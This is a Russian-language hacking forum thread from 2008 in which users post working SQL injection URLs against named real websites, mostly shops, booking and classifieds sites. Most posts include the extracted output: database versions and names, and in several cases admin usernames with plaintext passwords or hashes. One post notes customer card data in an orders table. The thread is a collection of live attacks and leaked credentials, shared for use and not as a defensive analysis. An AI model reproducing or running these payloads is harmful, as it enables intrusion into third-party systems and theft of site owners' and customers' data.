ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заказ номера в С. Петербурге
  #6931  
Старый 25.11.2008, 03:07
Аватар для FNS
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Заказ номера в С. Петербурге

Код:
http://www.booking-all.com/order.php?id=-2+union+select+concat(admin_name,0x3a,admin_pass)+from+admin--
Цитата:
http://www.booking-all.com/admin/
Цитата:
adminline:dge25ak519540
 
Ответить с цитированием

  #6932  
Старый 25.11.2008, 05:22
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.imperialtouch.com/page.php?id=-25+union+select+1,2,concat_ws(0x3A3a,version(),dat abase())/*

4.0.27-max-log::itadmin
________________________



http://www.ciaovillas.com/city_vacation_rentals.php?id=76&list=58&state=-39+union+select+concat_ws(0x3A3a,version(),databas e())--

5.0.68-log::Sql139072_1

Последний раз редактировалось ThreeD; 25.11.2008 в 06:39..
 
Ответить с цитированием

  #6933  
Старый 25.11.2008, 11:12
Аватар для tromlen
tromlen
Новичок
Регистрация: 23.08.2007
Сообщений: 4
Провел на форуме:
73032

Репутация: 4
По умолчанию

Код:
https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--

Цитата:marlee:d89da8338e706977fc6c5902abac3e be


Админки не нашел.

то FNS robots.txt смотрел ?
 
Ответить с цитированием

  #6934  
Старый 25.11.2008, 17:26
Аватар для crystalbit
crystalbit
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601

Репутация: 110
Отправить сообщение для crystalbit с помощью ICQ
По умолчанию

Цитата:
http://www.gfi.su/index_text_and_img.php?idt=841&categ_id=34&men_id= 7&langid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Цитата:
http://www.gfi.su/index_text_and_img.php?idt=841&categ_id=34&men_id= 7&langid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,':' ,passwd),9,10+from+gfi_forum.smf_members+limit+0,1/*
тИЦ 325, PR 4

Цитата:
version: 5.1.22-rc-log
database: gfi_su
user: gfi@localhost
 
Ответить с цитированием

  #6935  
Старый 25.11.2008, 18:39
Аватар для XaCeRoC
XaCeRoC
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286

Репутация: 83
Отправить сообщение для XaCeRoC с помощью ICQ
По умолчанию

Цитата:
http://www.grenadegloves.com/news.php?id=-1+union+all+select+1,2,3,concat(email,0x3a,passwor d),5,6,7,8,9+from+users--
..
 
Ответить с цитированием

  #6936  
Старый 25.11.2008, 18:49
Аватар для XaCeRoC
XaCeRoC
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286

Репутация: 83
Отправить сообщение для XaCeRoC с помощью ICQ
По умолчанию

Цитата:
http://buysellusa.net/classifieds/showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
..
 
Ответить с цитированием

  #6937  
Старый 25.11.2008, 18:51
Аватар для crystalbit
crystalbit
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601

Репутация: 110
Отправить сообщение для crystalbit с помощью ICQ
По умолчанию

Цитата:
http://www.reichert-reisen.ru/ru/ost.php?idt=-1+union+select+1,version(),3,4,database(),6,user() ,8,9--
единственная найденная мною таблица - news
Цитата:
4.1.21-log
reichert_base
reichert_user@localhost
 
Ответить с цитированием

  #6938  
Старый 25.11.2008, 20:04
Аватар для crystalbit
crystalbit
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601

Репутация: 110
Отправить сообщение для crystalbit с помощью ICQ
По умолчанию

Цитата:
http://tmxxi.ru/podholod.php?idt=-1+union+select+1,2,3/*
Database Version: 4.1.12
Database name: tmxxi
User name: tmxxi@localhost
..
Цитата:
http://tehbasa.ru/index.php?idt=-1+union+select+1,2,3,4,5,6,7/*
Database Version: 4.1.22-log
Database name: wwwtehbasaru_asid
User name: tehbasa_asid@79.174.73.72
 
Ответить с цитированием

  #6939  
Старый 25.11.2008, 21:57
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://file-ma iler.com/faq_man/catagorie.php?cat_id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_pass),5+from+faq_admin--

oka:d13f0c63fc5bfb88b9aca27d1888551d
 
Ответить с цитированием

  #6940  
Старый 26.11.2008, 12:49
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Shop. Вроде как диджейское оборудование и иже с ними.

http://www.spectrumaudio.com/manprods.php?id=-69+union+select+1,concat_ws(0x3A3a,database(),vers ion()),3,4--

spect9_spectrumaudio::5.0.51a-community

Дампим. Есть цэцэ кому интересно в таблице ордерс, они хешированы. Есть админские данные, админку не нашёл (или не искал?)) Не интересно.

http://www.spectrumaudio.com/phpinfo.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ